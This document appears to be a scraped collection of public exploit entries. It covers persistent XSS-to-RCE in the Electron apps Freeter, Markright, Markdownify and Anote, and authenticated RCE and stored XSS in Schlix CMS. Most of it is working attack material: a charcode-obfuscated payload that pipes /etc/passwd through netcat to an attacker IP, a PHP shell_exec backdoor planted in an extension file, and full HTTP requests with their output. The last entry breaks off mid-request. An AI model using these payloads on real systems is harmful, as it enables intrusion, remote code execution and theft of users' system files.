ISHACK AI BOT

# Exploit Title: Freeter 1.2.1 - Persistent Cross-Site Scripting # Exploit Author: TaurusOmar # Date: 04/05/2021 # CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H # Risk: High (8.8) # Vendor Homepage: https://freeter.io/ # Version: 1.2.1 # Tested on: Windows, Linux, MacOs # Software Description: It is an organizer for design, it allows you to work on as many projects as you want. with project drop-down menu facilities to switch between them easily. integrates widgets to set up a dashboard, giving you quick access to everything you need to work on a project. # Vulnerability Description: The software allows you to store payloads in the form of files or as custom widget titles, once the malicious code is entered, the payload will be executed when the victim moves the mouse or clicks. The attacker can send a malicious file with the payload, when this file is opened, the chain will be executed successfully giving access to the remote attacker to get remote execution on the computer. #Proof Video https://imgur.com/a/iBuKWm4 # Payload 2: exec(Attacker Reverse netcat stolen => /etc/passwd) && exec(calc) <audio src=x onerror=writeln(String.fromCharCode(10,60,97,117,100,105,111,32,115,114,99,61,120,32,111,110,101,114,114,111,114,61,34,99,111,110,115,116,32,101,120,101,99,61,32,114,101,113,117,105,114,101,40,39,99,104,105,108,100,95,112,114,111,99,101,115,115,39,41,46,101,120,101,99,59,10,101,120,101,99,40,39,110,99,32,45,119,32,51,32,49,57,50,46,49,54,56,46,49,49,49,46,49,50,57,32,49,51,51,55,32,60,32,47,101,116,99,47,112,97,115,115,119,100,39,44,32,40,101,44,32,115,116,100,111,117,116,44,32,115,116,100,101,114,114,41,61,62,32,123,32,105,102,32,40,101,32,105,110,115,116,97,110,99,101,111,102,32,69,114,114,111,114,41,32,123,10,99,111,110,115,111,108,101,46,101,114,114,111,114,40,101,41,59,32,116,104,114,111,119,32,101,59,32,125,32,99,111,110,115,111,108,101,46,108,111,103,40,39,115,116,100,111,117,116,32,39,44,32,115,116,100,111,117,116,41,59,10,99,111,110,115,111,108,101,46,108,111,103,40,39,115,116,100,101,114,114,32,39,44,32,115,116,100,101,114,114,41,59,125,41,59,10,97,108,101,114,116,40,39,49,39,41,34,62,60,115,99,114,105,112,116,62,10,118,97,114,32,80,114,111,99,101,115,115,32,61,32,112,114,111,99,101,115,115,46,98,105,110,100,105,110,103,40,39,112,114,111,99,101,115,115,95,119,114,97,112,39,41,46,80,114,111,99,101,115,115,59,10,118,97,114,32,112,114,111,99,32,61,32,110,101,119,32,80,114,111,99,101,115,115,40,41,59,10,112,114,111,99,46,111,110,101,120,105,116,32,61,32,102,117,110,99,116,105,111,110,40,97,44,98,41,32,123,125,59,10,118,97,114,32,101,110,118,32,61,32,112,114,111,99,101,115,115,46,101,110,118,59,10,118,97,114,32,101,110,118,95,32,61,32,91,93,59,10,102,111,114,32,40,118,97,114,32,107,101,121,32,105,110,32,101,110,118,41,32,101,110,118,95,46,112,117,115,104,40,107,101,121,43,39,61,39,43,101,110,118,91,107,101,121,93,41,59,10,112,114,111,99,46,115,112,97,119,110,40,123,102,105,108,101,58,39,47,117,115,114,47,98,105,110,47,103,110,111,109,101,45,99,97,108,99,117,108,97,116,111,114,39,44,99,119,100,58,110,117,108,108,44,119,105,110,100,111,119,115,86,101,114,98,97,116,105,109,65,114,103,117,109,101,110,116,115,58,102,97,108,115,101,44,100,101,116,97,99,104,101,100,58,102,97,108,115,101,44,101,110,118,80,97,105,114,115,58,101,110,118,95,44,115,116,100,105,111,58,91,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,44,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,44,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,93,125,41,59,10,60,47,115,99,114,105,112,116,62))>

# Exploit Title: Markright 1.0 - Persistent Cross-Site Scripting # Exploit Author: TaurusOmar # Date: 04/05/2021 # CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H # Risk: High (8.8) # Vendor Homepage: https://github.com/dvcrn/markright # Version: 1.0 # Tested on: Linux, MacOs,Windows # Software Description: A minimalist discount editor with github flavor, it allows to view, edit and load files with markdown extension (.md) quickly and with a friendly interface. # Vulnerability Description: The software allows you to store payloads within its own editor, as well as upload (.md) files once malicious code is entered, the payload will be executed immediately.The attacker can send a malicious file with the payload, when this file is opened, the chain will be executed successfully giving access to the remote attacker to get remote execution on the computer. #Proof video https://imgur.com/a/VOsgKbZ # Payload: exec(Attacker Reverse netcat stolen => /etc/passwd) && exec(calc) [<audio src=x onerror=writeln(String.fromCharCode(10,60,97,117,100,105,111,32,115,114,99,61,120,32,111,110,101,114,114,111,114,61,34,99,111,110,115,116,32,101,120,101,99,61,32,114,101,113,117,105,114,101,40,39,99,104,105,108,100,95,112,114,111,99,101,115,115,39,41,46,101,120,101,99,59,10,101,120,101,99,40,39,110,99,32,45,119,32,51,32,49,57,50,46,49,54,56,46,49,49,49,46,49,50,57,32,49,51,51,55,32,60,32,47,101,116,99,47,112,97,115,115,119,100,39,44,32,40,101,44,32,115,116,100,111,117,116,44,32,115,116,100,101,114,114,41,61,62,32,123,32,105,102,32,40,101,32,105,110,115,116,97,110,99,101,111,102,32,69,114,114,111,114,41,32,123,10,99,111,110,115,111,108,101,46,101,114,114,111,114,40,101,41,59,32,116,104,114,111,119,32,101,59,32,125,32,99,111,110,115,111,108,101,46,108,111,103,40,39,115,116,100,111,117,116,32,39,44,32,115,116,100,111,117,116,41,59,10,99,111,110,115,111,108,101,46,108,111,103,40,39,115,116,100,101,114,114,32,39,44,32,115,116,100,101,114,114,41,59,125,41,59,10,97,108,101,114,116,40,39,49,39,41,34,62,60,115,99,114,105,112,116,62,10,118,97,114,32,80,114,111,99,101,115,115,32,61,32,112,114,111,99,101,115,115,46,98,105,110,100,105,110,103,40,39,112,114,111,99,101,115,115,95,119,114,97,112,39,41,46,80,114,111,99,101,115,115,59,10,118,97,114,32,112,114,111,99,32,61,32,110,101,119,32,80,114,111,99,101,115,115,40,41,59,10,112,114,111,99,46,111,110,101,120,105,116,32,61,32,102,117,110,99,116,105,111,110,40,97,44,98,41,32,123,125,59,10,118,97,114,32,101,110,118,32,61,32,112,114,111,99,101,115,115,46,101,110,118,59,10,118,97,114,32,101,110,118,95,32,61,32,91,93,59,10,102,111,114,32,40,118,97,114,32,107,101,121,32,105,110,32,101,110,118,41,32,101,110,118,95,46,112,117,115,104,40,107,101,121,43,39,61,39,43,101,110,118,91,107,101,121,93,41,59,10,112,114,111,99,46,115,112,97,119,110,40,123,102,105,108,101,58,39,47,117,115,114,47,98,105,110,47,103,110,111,109,101,45,99,97,108,99,117,108,97,116,111,114,39,44,99,119,100,58,110,117,108,108,44,119,105,110,100,111,119,115,86,101,114,98,97,116,105,109,65,114,103,117,109,101,110,116,115,58,102,97,108,115,101,44,100,101,116,97,99,104,101,100,58,102,97,108,115,101,44,101,110,118,80,97,105,114,115,58,101,110,118,95,44,115,116,100,105,111,58,91,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,44,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,44,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,93,125,41,59,10,60,47,115,99,114,105,112,116,62))>](http://)

# Exploit Title: Markdownify 1.2.0 - Persistent Cross-Site Scripting # Exploit Author: TaurusOmar # Date: 04/05/2021 # CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H # Risk: High (8.8) # Vendor Homepage: https://github.com/amitmerchant1990/electron-markdownify # Version: 1.2.0 # Tested on: Windows, Linux, MacOs # Software Description: It is a lightweight editor for viewing and editing the markdown documentation of aYou can browse your personal folder to view and edit your files, change view / edit mode in md file with subject at the top. # Vulnerability Description: The software allows you to store payloads within its own editor, as well as upload (.md) files once malicious code is entered, the payload will be executed immediately. The attacker can send a malicious file with the payload, when this file is opened, the chain will be executed successfully giving access to the the remote attacker to get remote execution on the computer. #Proof https://imgur.com/a/T4jBoiS # Payload: exec(Attacker Reverse netcat stolen => /etc/passwd) && exec(calc) [<audio src=x onerror=writeln(String.fromCharCode(10,60,97,117,100,105,111,32,115,114,99,61,120,32,111,110,101,114,114,111,114,61,34,99,111,110,115,116,32,101,120,101,99,61,32,114,101,113,117,105,114,101,40,39,99,104,105,108,100,95,112,114,111,99,101,115,115,39,41,46,101,120,101,99,59,10,101,120,101,99,40,39,110,99,32,45,119,32,51,32,49,57,50,46,49,54,56,46,49,49,49,46,49,50,57,32,49,51,51,55,32,60,32,47,101,116,99,47,112,97,115,115,119,100,39,44,32,40,101,44,32,115,116,100,111,117,116,44,32,115,116,100,101,114,114,41,61,62,32,123,32,105,102,32,40,101,32,105,110,115,116,97,110,99,101,111,102,32,69,114,114,111,114,41,32,123,10,99,111,110,115,111,108,101,46,101,114,114,111,114,40,101,41,59,32,116,104,114,111,119,32,101,59,32,125,32,99,111,110,115,111,108,101,46,108,111,103,40,39,115,116,100,111,117,116,32,39,44,32,115,116,100,111,117,116,41,59,10,99,111,110,115,111,108,101,46,108,111,103,40,39,115,116,100,101,114,114,32,39,44,32,115,116,100,101,114,114,41,59,125,41,59,10,97,108,101,114,116,40,39,49,39,41,34,62,60,115,99,114,105,112,116,62,10,118,97,114,32,80,114,111,99,101,115,115,32,61,32,112,114,111,99,101,115,115,46,98,105,110,100,105,110,103,40,39,112,114,111,99,101,115,115,95,119,114,97,112,39,41,46,80,114,111,99,101,115,115,59,10,118,97,114,32,112,114,111,99,32,61,32,110,101,119,32,80,114,111,99,101,115,115,40,41,59,10,112,114,111,99,46,111,110,101,120,105,116,32,61,32,102,117,110,99,116,105,111,110,40,97,44,98,41,32,123,125,59,10,118,97,114,32,101,110,118,32,61,32,112,114,111,99,101,115,115,46,101,110,118,59,10,118,97,114,32,101,110,118,95,32,61,32,91,93,59,10,102,111,114,32,40,118,97,114,32,107,101,121,32,105,110,32,101,110,118,41,32,101,110,118,95,46,112,117,115,104,40,107,101,121,43,39,61,39,43,101,110,118,91,107,101,121,93,41,59,10,112,114,111,99,46,115,112,97,119,110,40,123,102,105,108,101,58,39,47,117,115,114,47,98,105,110,47,103,110,111,109,101,45,99,97,108,99,117,108,97,116,111,114,39,44,99,119,100,58,110,117,108,108,44,119,105,110,100,111,119,115,86,101,114,98,97,116,105,109,65,114,103,117,109,101,110,116,115,58,102,97,108,115,101,44,100,101,116,97,99,104,101,100,58,102,97,108,115,101,44,101,110,118,80,97,105,114,115,58,101,110,118,95,44,115,116,100,105,111,58,91,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,44,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,44,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,93,125,41,59,10,60,47,115,99,114,105,112,116,62))>](http://)

# Exploit Title: Anote 1.0 - Persistent Cross-Site Scripting # Exploit Author: TaurusOmar # Date: 04/05/2021 # CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H # Risk: High (8.8) # Vendor Homepage: https://github.com/AnotherNote/anote # Version: 1.0 # Tested on: Linux, MacOs # Software Description: A simple opensource note app support markdown only, anote allows you to view and edit files markdown has a friendly interface for paste image paste html (includes retrieve image locally) export sale file with images export PDF support tray menu quick note (evernote inspired) cmd + v default will convert html. # Vulnerability Description: The software allows you to store payloads within its own editor, as well as upload (.md) files once malicious code is entered, the payload will be executed immediately. The attacker can send a malicious file with the payload, when this file is opened, the chain will be executed successfully giving access to the remote attacker to get remote execution on the computer. #Proof Video https://imgur.com/a/mFMDOuu # Payload : exec(Attacker Reverse netcat stolen => /etc/passwd) && exec(calc) {"bookId":"ddpQIk8Fhmoyr2wK","available":true,"_id":"VDJCb2CaIHObFXlw","createdAt":{"$$date":1620076429201},"updatedAt":{"$$date":1620076529398},"title":"XSS TO RCE","content":"[<audio src=x onerror=writeln(String.fromCharCode(10,60,97,117,100,105,111,32,115,114,99,61,120,32,111,110,101,114,114,111,114,61,34,99,111,110,115,116,32,101,120,101,99,61,32,114,101,113,117,105,114,101,40,39,99,104,105,108,100,95,112,114,111,99,101,115,115,39,41,46,101,120,101,99,59,10,101,120,101,99,40,39,110,99,32,45,119,32,51,32,49,57,50,46,49,54,56,46,49,49,49,46,49,50,57,32,49,51,51,55,32,60,32,47,101,116,99,47,112,97,115,115,119,100,39,44,32,40,101,44,32,115,116,100,111,117,116,44,32,115,116,100,101,114,114,41,61,62,32,123,32,105,102,32,40,101,32,105,110,115,116,97,110,99,101,111,102,32,69,114,114,111,114,41,32,123,10,99,111,110,115,111,108,101,46,101,114,114,111,114,40,101,41,59,32,116,104,114,111,119,32,101,59,32,125,32,99,111,110,115,111,108,101,46,108,111,103,40,39,115,116,100,111,117,116,32,39,44,32,115,116,100,111,117,116,41,59,10,99,111,110,115,111,108,101,46,108,111,103,40,39,115,116,100,101,114,114,32,39,44,32,115,116,100,101,114,114,41,59,125,41,59,10,97,108,101,114,116,40,39,49,39,41,34,62,60,115,99,114,105,112,116,62,10,118,97,114,32,80,114,111,99,101,115,115,32,61,32,112,114,111,99,101,115,115,46,98,105,110,100,105,110,103,40,39,112,114,111,99,101,115,115,95,119,114,97,112,39,41,46,80,114,111,99,101,115,115,59,10,118,97,114,32,112,114,111,99,32,61,32,110,101,119,32,80,114,111,99,101,115,115,40,41,59,10,112,114,111,99,46,111,110,101,120,105,116,32,61,32,102,117,110,99,116,105,111,110,40,97,44,98,41,32,123,125,59,10,118,97,114,32,101,110,118,32,61,32,112,114,111,99,101,115,115,46,101,110,118,59,10,118,97,114,32,101,110,118,95,32,61,32,91,93,59,10,102,111,114,32,40,118,97,114,32,107,101,121,32,105,110,32,101,110,118,41,32,101,110,118,95,46,112,117,115,104,40,107,101,121,43,39,61,39,43,101,110,118,91,107,101,121,93,41,59,10,112,114,111,99,46,115,112,97,119,110,40,123,102,105,108,101,58,39,47,117,115,114,47,98,105,110,47,103,110,111,109,101,45,99,97,108,99,117,108,97,116,111,114,39,44,99,119,100,58,110,117,108,108,44,119,105,110,100,111,119,115,86,101,114,98,97,116,105,109,65,114,103,117,109,101,110,116,115,58,102,97,108,115,101,44,100,101,116,97,99,104,101,100,58,102,97,108,115,101,44,101,110,118,80,97,105,114,115,58,101,110,118,95,44,115,116,100,105,111,58,91,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,44,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,44,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,93,125,41,59,10,60,47,115,99,114,105,112,116,62))>](http://)"} {"$$indexCreated":{"fieldName":"updatedAt","unique":false,"sparse":false}} {"$$indexCreated":{"fieldName":"bookId","unique":false,"sparse":false}}

# Exploit Title: Schlix CMS 2.2.6-6 - Remote Code Execution (Authenticated) # Date: 2021-05-06 # Exploit Author: Eren Saraç # Vendor Homepage: https://www.schlix.com/ # Software Link: https://www.schlix.com/downloads/schlix-cms/schlix-cms-v2.2.6-6.zip # Version: 2.2.6-6 # Tested on: Windows & WampServer ==> Tutorial <== 1- Login with your account. 2- Go to the block management section. Directory is '/admin/app/core.blockmanager'. 3- Create a new category. 4- Download the 'mailchimp' extension from here. => https://github.com/calip/app_mailchimp 5- Open the 'packageinfo.inc' file. It is in '/blocks/mailchimp' directory. 6- Paste this PHP code below and save it. ##################################### $command = shell_exec('netstat -an'); echo "<pre>$command</pre>"; ?> ##################################### 7- Compress the file to ZIP and rename it 'combo_mailchimp-1_0_1'. 8- Install a package to created category and enter the installed 'mailchimp' extension. 9- Click the 'About' tab and our php code will be executed. ==> Vulnerable 'packageinfo.inc' file. (mailchimp Extension) <== <?php $name = 'mailchimp'; $type = 'block'; $guid = '860e9d79-c5d0-37e4-894e-cdc19d06c7c3'; $version = '1.0'; $license = 'MIT'; $description = 'Mailchimp is the leading email marketing platform, that lets you send out fully customized email and newsletter campaigns to your subscribers. It is an imperative tool to build and follow through on your sales funnel, and helps you create and maintain lasting relations with your site visitors and customers.'; $author = 'Alip'; $url = 'https://github.com/calip/app_mailchimp'; $email = '[email protected]'; $copyright = 'Copyright &copy;2019 calip'; $command = shell_exec('netstat -an'); echo "<pre>$command</pre>"; ?> ==> HTTP Request (ZIP Extension Installation) <== POST /admin/app/core.blockmanager?&ajax=1&action=install HTTP/1.1 Host: (HOST) User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0 Accept: */* Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest X-Schlix-Ajax: 1 Content-Type: multipart/form-data; boundary=---------------------------29322337091578227221515354130 Content-Length: 51585 Origin: http(s)://(ORIGIN) Connection: close Referer: http(s)://(REFERER)/admin/app/core.blockmanager Cookie: core-blockmanager_currentCategory=27; scx2f1afdb4b86ade4919555d446d2f0909=1pv1irnlepvjojieipevvn65p2; schlix_frontendedit_control_showblock=-2; schlix_frontendedit_control_showhide=-2; schlix_frontendedit_control_showdoc=-2 -----------------------------29322337091578227221515354130 Content-Disposition: form-data; name="_csrftoken" a3b9a0da8d6be08513f60d1744e2642df0702ff7 -----------------------------29322337091578227221515354130 Content-Disposition: form-data; name="zipfileupload"; filename="combo_mailchimp-1_0_1.zip" Content-Type: application/x-zip-compressed ############################################# ############################################# ############################################# ############################################# ############################################# ############################################# ############################################# ############################################# ############################################# ############################################# -----------------------------29322337091578227221515354130 Content-Disposition: form-data; name="MAX_FILE_SIZE" 2097152 -----------------------------29322337091578227221515354130 Content-Disposition: form-data; name="zipfileupload__total_file_size" 0 -----------------------------29322337091578227221515354130 Content-Disposition: form-data; name="zipfileupload__max_file_count" 20 -----------------------------29322337091578227221515354130 Content-Disposition: form-data; name="password" # Your ACC Password. -----------------------------29322337091578227221515354130-- ==> HTTP Request (RCE - About Tab) <== GET /admin/app/core.blockmanager?action=edititem&id=44 HTTP/1.1 Host: (HOST) User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http(s)://(HOST)/ Connection: close Cookie: core-blockmanager_currentCategory=27; scx2f1afdb4b86ade4919555d446d2f0909=1pv1irnlepvjojieipevvn65p2; schlix_frontendedit_control_showblock=-2; schlix_frontendedit_control_showhide=-2; schlix_frontendedit_control_showdoc=-2 Upgrade-Insecure-Requests: 1 ==> HTTP Response (RCE - About Tab) <== HTTP/1.1 200 OK Date: Wed, 05 May 2021 21:49:24 GMT Server: Apache/2.4.46 (Win64) PHP/7.3.21 X-Powered-By: PHP/7.3.21 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: scx2f1afdb4b86ade4919555d446d2f0909=1pv1irnlepvjojieipevvn65p2; expires=Wed, 05-May-2021 23:49:24 GMT; Max-Age=7200; path=/cms/; domain=127.0.0.1; HttpOnly; SameSite=lax Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 49575 <!DOCTYPE html> <html> <body> <div id="tab_options" class="schlixui-childtab"> <pre> Active Connections Proto Local Address Foreign Address State TCP 0.0.0.0:80 0.0.0.0:0 LISTENING TCP 0.0.0.0:135 0.0.0.0:0 LISTENING TCP 0.0.0.0:445 0.0.0.0:0 LISTENING TCP 0.0.0.0:902 0.0.0.0:0 LISTENING TCP 0.0.0.0:912 0.0.0.0:0 LISTENING TCP 0.0.0.0:3306 0.0.0.0:0 LISTENING TCP 0.0.0.0:3307 0.0.0.0:0 LISTENING TCP 0.0.0.0:5040 0.0.0.0:0 LISTENING TCP 0.0.0.0:7680 0.0.0.0:0 LISTENING TCP 0.0.0.0:49664 0.0.0.0:0 LISTENING TCP 0.0.0.0:49665 0.0.0.0:0 LISTENING TCP 0.0.0.0:49666 0.0.0.0:0 LISTENING TCP 0.0.0.0:49667 0.0.0.0:0 LISTENING TCP 0.0.0.0:49668 0.0.0.0:0 LISTENING TCP 0.0.0.0:50296 0.0.0.0:0 LISTENING TCP 127.0.0.1:80 127.0.0.1:58843 TIME_WAIT TCP 127.0.0.1:80 127.0.0.1:58853 TIME_WAIT TCP 127.0.0.1:80 127.0.0.1:58854 TIME_WAIT TCP 127.0.0.1:80 127.0.0.1:58859 TIME_WAIT TCP 127.0.0.1:80 127.0.0.1:58860 TIME_WAIT TCP 127.0.0.1:80 127.0.0.1:58865 TIME_WAIT TCP 127.0.0.1:80 127.0.0.1:58868 TIME_WAIT TCP 127.0.0.1:80 127.0.0.1:58883 TIME_WAIT TCP 127.0.0.1:80 127.0.0.1:58893 TIME_WAIT TCP 127.0.0.1:80 127.0.0.1:58894 TIME_WAIT TCP 127.0.0.1:80 127.0.0.1:58899 TIME_WAIT TCP 127.0.0.1:80 127.0.0.1:58902 TIME_WAIT TCP 127.0.0.1:80 127.0.0.1:58908 TIME_WAIT TCP 127.0.0.1:80 127.0.0.1:58918 TIME_WAIT TCP 127.0.0.1:80 127.0.0.1:58919 TIME_WAIT TCP 127.0.0.1:80 127.0.0.1:58924 TIME_WAIT TCP 127.0.0.1:8080 127.0.0.1:58886 TIME_WAIT TCP 127.0.0.1:8080 127.0.0.1:58887 TIME_WAIT TCP 127.0.0.1:8080 127.0.0.1:58888 TIME_WAIT TCP 127.0.0.1:8080 127.0.0.1:58891 TIME_WAIT TCP 127.0.0.1:8080 127.0.0.1:58905 CLOSE_WAIT TCP 127.0.0.1:8080 127.0.0.1:58907 TIME_WAIT TCP 127.0.0.1:8080 127.0.0.1:58911 TIME_WAIT TCP 127.0.0.1:8080 127.0.0.1:58913 TIME_WAIT TCP 127.0.0.1:8080 127.0.0.1:58915 TIME_WAIT TCP 127.0.0.1:8080 127.0.0.1:58916 TIME_WAIT TCP 127.0.0.1:58424 127.0.0.1:58425 ESTABLISHED TCP 127.0.0.1:58425 127.0.0.1:58424 ESTABLISHED TCP 127.0.0.1:58435 127.0.0.1:58436 ESTABLISHED TCP 127.0.0.1:58436 127.0.0.1:58435 ESTABLISHED TCP 127.0.0.1:58565 127.0.0.1:58566 ESTABLISHED TCP 127.0.0.1:58566 127.0.0.1:58565 ESTABLISHED TCP 127.0.0.1:58639 127.0.0.1:58640 ESTABLISHED TCP 127.0.0.1:58640 127.0.0.1:58639 ESTABLISHED TCP 169.254.22.167:139 0.0.0.0:0 LISTENING TCP 169.254.224.26:139 0.0.0.0:0 LISTENING TCP 192.168.1.8:139 0.0.0.0:0 LISTENING TCP 192.168.1.8:49500 95.101.14.77:443 ESTABLISHED TCP 192.168.1.8:57059 162.159.129.235:443 ESTABLISHED TCP 192.168.1.8:57902 162.159.138.234:443 ESTABLISHED TCP 192.168.1.8:58453 44.235.189.138:443 ESTABLISHED TCP 192.168.1.8:58626 162.159.138.232:443 ESTABLISHED TCP 192.168.1.8:58627 162.159.133.234:443 ESTABLISHED TCP 192.168.1.8:58699 162.159.135.232:443 ESTABLISHED TCP 192.168.1.8:58841 20.44.232.74:443 ESTABLISHED TCP 192.168.1.8:58942 162.159.138.232:443 ESTABLISHED TCP 192.168.1.8:58951 138.68.92.190:443 ESTABLISHED TCP 192.168.1.8:60549 51.103.5.159:443 ESTABLISHED TCP 192.168.1.8:60610 104.66.70.197:443 ESTABLISHED TCP 192.168.1.8:60611 104.66.70.197:443 ESTABLISHED TCP 192.168.1.8:60612 217.31.233.104:443 CLOSE_WAIT TCP [::]:80 [::]:0 LISTENING TCP [::]:135 [::]:0 LISTENING TCP [::]:445 [::]:0 LISTENING TCP [::]:3306 [::]:0 LISTENING TCP [::]:3307 [::]:0 LISTENING TCP [::]:7680 [::]:0 LISTENING TCP [::]:49664 [::]:0 LISTENING TCP [::]:49665 [::]:0 LISTENING TCP [::]:49666 [::]:0 LISTENING TCP [::]:49667 [::]:0 LISTENING TCP [::]:49668 [::]:0 LISTENING TCP [::]:50296 [::]:0 LISTENING TCP [::1]:3306 [::1]:58845 TIME_WAIT TCP [::1]:3306 [::1]:58856 TIME_WAIT TCP [::1]:3306 [::1]:58857 TIME_WAIT TCP [::1]:3306 [::1]:58858 TIME_WAIT TCP [::1]:3306 [::1]:58932 TIME_WAIT TCP [::1]:3306 [::1]:58935 TIME_WAIT TCP [::1]:3306 [::1]:58940 TIME_WAIT TCP [::1]:3306 [::1]:58950 TIME_WAIT TCP [::1]:3306 [::1]:58953 ESTABLISHED TCP [::1]:3306 [::1]:58954 ESTABLISHED TCP [::1]:49485 [::1]:49486 ESTABLISHED TCP [::1]:49486 [::1]:49485 ESTABLISHED TCP [::1]:49669 [::]:0 LISTENING TCP [::1]:58844 [::1]:3306 TIME_WAIT TCP [::1]:58845 [::1]:3306 TIME_WAIT TCP [::1]:58855 [::1]:3306 TIME_WAIT TCP [::1]:58856 [::1]:3306 TIME_WAIT TCP [::1]:58857 [::1]:3306 TIME_WAIT TCP [::1]:58858 [::1]:3306 TIME_WAIT TCP [::1]:58861 [::1]:3306 TIME_WAIT TCP [::1]:58862 [::1]:3306 TIME_WAIT TCP [::1]:58863 [::1]:3306 TIME_WAIT TCP [::1]:58864 [::1]:3306 TIME_WAIT TCP [::1]:58866 [::1]:3306 TIME_WAIT TCP [::1]:58867 [::1]:3306 TIME_WAIT TCP [::1]:58869 [::1]:3306 TIME_WAIT TCP [::1]:58870 [::1]:3306 TIME_WAIT TCP [::1]:58884 [::1]:3306 TIME_WAIT TCP [::1]:58885 [::1]:3306 TIME_WAIT TCP [::1]:58929 [::1]:3306 TIME_WAIT TCP [::1]:58930 [::1]:3306 TIME_WAIT TCP [::1]:58931 [::1]:3306 TIME_WAIT TCP [::1]:58932 [::1]:3306 TIME_WAIT TCP [::1]:58934 [::1]:3306 TIME_WAIT TCP [::1]:58935 [::1]:3306 TIME_WAIT TCP [::1]:58939 [::1]:3306 TIME_WAIT TCP [::1]:58940 [::1]:3306 TIME_WAIT TCP [::1]:58946 [::1]:3306 TIME_WAIT TCP [::1]:58947 [::1]:3306 TIME_WAIT TCP [::1]:58949 [::1]:3306 TIME_WAIT TCP [::1]:58950 [::1]:3306 TIME_WAIT TCP [::1]:58953 [::1]:3306 ESTABLISHED TCP [::1]:58954 [::1]:3306 ESTABLISHED UDP 0.0.0.0:5050 *:* UDP 0.0.0.0:5353 *:* UDP 0.0.0.0:5355 *:* UDP 0.0.0.0:53240 *:* UDP 0.0.0.0:53241 *:* UDP 127.0.0.1:1900 *:* UDP 127.0.0.1:62353 *:* UDP 127.0.0.1:63129 *:* UDP 192.168.1.8:137 *:* UDP 192.168.1.8:138 *:* UDP 192.168.1.8:1900 *:* UDP 192.168.1.8:2177 *:* UDP 192.168.1.8:63128 *:* UDP [::]:5353 *:* UDP [::]:5355 *:* UDP [::1]:1900 *:* UDP [::1]:63125 *:* UDP [fe80::e4d5:62f5:da3:2dae%21]:1900 *:* UDP [fe80::e4d5:62f5:da3:2dae%21]:2177 *:* UDP [fe80::e4d5:62f5:da3:2dae%21]:63124 *:* </pre> <div class="content"> <div class="row"> <div class="col-xs-12"> <div class="text-center"> <h1>mailchimp</h1> <p>v1.0</p><p>Author: <a href="mailto:[email protected]">Alip</a></p> <p>Web: <a href="https://github.com/calip/app_mailchimp">https://github.com/calip/app_mailchimp</a></p> <p><a href="/cms/admin/app/core.blockmanager?action=uninstall&name=mailchimp"><i class="fa fa-times-circle"></i>Uninstall</a></p> </div> </div> </div> </div> </div> </body>

# Exploit Title: Schlix CMS 2.2.6-6 - 'title' Persistent Cross-Site Scripting (Authenticated) # Date: 2021-05-05 # Exploit Author: Emircan Baş # Vendor Homepage: https://www.schlix.com/ # Software Link: https://www.schlix.com/downloads/schlix-cms/schlix-cms-v2.2.6-6.zip # Version: 2.2.6-6 # Tested on: Windows & WampServer ==> Tutorial <== 1- Login with your account. 2- Go to the contacts section. Directory is '/admin/app/contact'. 3- Create a new category and type an XSS payload into the category title. 4- XSS payload will be executed when we travel to created page. ==> Vulnerable Source Code <== <article class="main category"> <div class="media-header-full-width " style="background-image: url('https://static-demo.schlix.website/images/static/sample1/header/header_img_10.jpg');"> <div class="media-header-title container d-flex h-100"> <div class="row align-self-center w-100"> <div class="col-8 mx-auto"> <div class="text-center"> <h1 class="item title" itemprop="headline">&#039;"><script>alert(1)</script></h1> # OUR PAYLOAD IS NON-EXECUTEABLE </div> </div> </div> </div> </div> <div class="breadcrumb-bg"> <div class="container"> <div class="breadcrumb-container"><ol class="breadcrumb"><li class="breadcrumb-item"><a class="breadcrumb-home" href="/cms"> <i class="fa fa-home"></i></a></li><li class="breadcrumb-item"><a href="/cms/contacts/">Contacts</a></li><li class="breadcrumb-item"> <a href="/cms/contacts/script-alert-2-script/"><script>alert(1)</script></a></li></ol></div></div> # EXECUTED PLACE </div> ==> HTTP Request <== POST /admin/app/contacts?action=savecategory HTTP/1.1 Host: (HOST) User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------280033592236615772622294478489 Content-Length: 4146 Origin: (ORIGIN) Connection: close Referer: (REFERER) Cookie: contacts_currentCategory=6; scx2f1afdb4b86ade4919555d446d2f0909=gi3u57kmk34s77f1fngigm1k1b; gusrinstall=rt9kps56aasmd8445f7ufr7mva; schlix_frontendedit_control_showblock=-2; schlix_frontendedit_control_showhide=-2; schlix_frontendedit_control_showdoc=-2 Upgrade-Insecure-Requests: 1 -----------------------------280033592236615772622294478489 Content-Disposition: form-data; name="_csrftoken" 49feefcd2b917b9855cd55c8bd174235fa5912e4 -----------------------------280033592236615772622294478489 Content-Disposition: form-data; 